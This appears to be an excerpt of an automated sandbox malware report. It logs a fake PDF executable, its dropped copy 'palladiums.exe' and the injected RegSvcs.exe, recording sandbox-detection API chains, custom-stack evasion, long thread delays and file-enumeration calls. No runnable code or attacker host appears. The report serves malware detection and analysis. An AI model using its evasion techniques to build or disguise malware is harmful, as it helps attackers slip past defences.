Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\silvexes\palladiums.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Found API chain indicative of sandbox detection

Source: C:\Users\user\Desktop\Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe	Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep			graph_0-96996
Source: C:\Users\user\AppData\Local\silvexes\palladiums.exe	Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\AppData\Local\silvexes\palladiums.exe	API/Special instruction interceptor: Address: 1635DC4
Source: C:\Users\user\AppData\Local\silvexes\palladiums.exe	API/Special instruction interceptor: Address: EBE1EC

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599812	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599687	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599578	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599468	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599359	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599250	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599140	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599031	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598921	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598812	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598703	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598593	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598484	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598375	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598265	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598154	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598046	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597937	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597828	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597622	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597515	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597406	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597296	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597187	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597078	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596968	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596859	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596750	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596640	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596531	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596422	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596312	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596203	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596093	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595984	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595869	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595750	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595640	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595530	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595421	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595258	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595093	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594945	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594828	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594718	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594605	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594484	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594375	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594265	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594156	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594047	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599765	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599218	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599109	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598890	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598671	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598562	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598453	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598343	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598233	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598122	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598015	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597906	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597797	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597687	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597578	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597468	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597359	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597250	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597140	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597031	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596921	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596812	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596703	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596593	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596482	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596375	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596265	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596156	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596047	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595937	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595828	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595718	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595609	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595500	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595390	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595281	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595172	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595062	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594953	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594843	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594731	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594625	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 1908	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 7938	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 3894	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 5958	Jump to behavior

Source: C:\Users\user\Desktop\Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe	API coverage: 3.7 %
Source: C:\Users\user\AppData\Local\silvexes\palladiums.exe	API coverage: 4.0 %

Source: C:\Users\user\Desktop\Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe	Code function: 0_2_0026DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	0_2_0026DBBE
Source: C:\Users\user\Desktop\Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe	Code function: 0_2_0023C2A2 FindFirstFileExW,	0_2_0023C2A2
Source: C:\Users\user\Desktop\Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe	Code function: 0_2_002768EE FindFirstFileW,FindClose,	0_2_002768EE
Source: C:\Users\user\Desktop\Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe	Code function: 0_2_0027698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	0_2_0027698F
Source: C:\Users\user\Desktop\Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe	Code function: 0_2_0026D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_0026D076
Source: C:\Users\user\Desktop\Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe	Code function: 0_2_0026D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_0026D3A9
Source: C:\Users\user\Desktop\Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe	Code function: 0_2_00279642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00279642
Source: C:\Users\user\Desktop\Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe	Code function: 0_2_0027979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0027979D
Source: C:\Users\user\Desktop\Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe	Code function: 0_2_00279B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,	0_2_00279B2B
Source: C:\Users\user\Desktop\Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe	Code function: 0_2_00275C97 FindFirstFileW,FindNextFileW,FindClose,	0_2_00275C97
Source: C:\Users\user\AppData\Local\silvexes\palladiums.exe	Code function: 2_2_0055DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	2_2_0055DBBE
Source: C:\Users\user\AppData\Local\silvexes\palladiums.exe	Code function: 2_2_0052C2A2 FindFirstFileExW,	2_2_0052C2A2
Source: C:\Users\user\AppData\Local\silvexes\palladiums.exe	Code function: 2_2_005668EE FindFirstFileW,FindClose,	2_2_005668EE
Source: C:\Users\user\AppData\Local\silvexes\palladiums.exe	Code function: 2_2_0056698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	2_2_0056698F
Source: C:\Users\user\AppData\Local\silvexes\palladiums.exe	Code function: 2_2_0055D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	2_2_0055D076
Source: C:\Users\user\AppData\Local\silvexes\palladiums.exe	Code function: 2_2_0055D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	2_2_0055D3A9
Source: C:\Users\user\AppData\Local\silvexes\palladiums.exe	Code function: 2_2_00569642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	2_2_00569642
Source: C:\Users\user\AppData\Local\silvexes\palladiums.exe	Code function: 2_2_0056979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	2_2_0056979D
Source: C:\Users\user\AppData\Local\silvexes\palladiums.exe	Code function: 2_2_00569B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,	2_2_00569B2B
Source: C:\Users\user\AppData\Local\silvexes\palladiums.exe	Code function: 2_2_00565C97 FindFirstFileW,FindNextFileW,FindClose,	2_2_00565C97

Source: C:\Users\user\Desktop\Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe

Code function: 0_2_002042DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_002042DE

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599812	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599687	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599578	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599468	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599359	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599250	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599140	Jump to behavior
